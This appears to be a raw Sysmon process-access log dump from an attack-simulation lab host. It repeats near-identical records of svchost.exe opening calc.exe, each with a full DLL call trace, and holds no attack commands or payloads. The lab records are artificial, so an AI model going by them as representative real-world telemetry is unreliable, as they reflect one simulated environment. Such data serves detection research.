22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360247Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360246Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360245Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360244Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360243Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360242Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360241Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360240Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360239Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360238Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360237Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360236Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360235Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360234Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360233Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360232Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360231Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360230Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360229Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360228Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360227Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360226Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 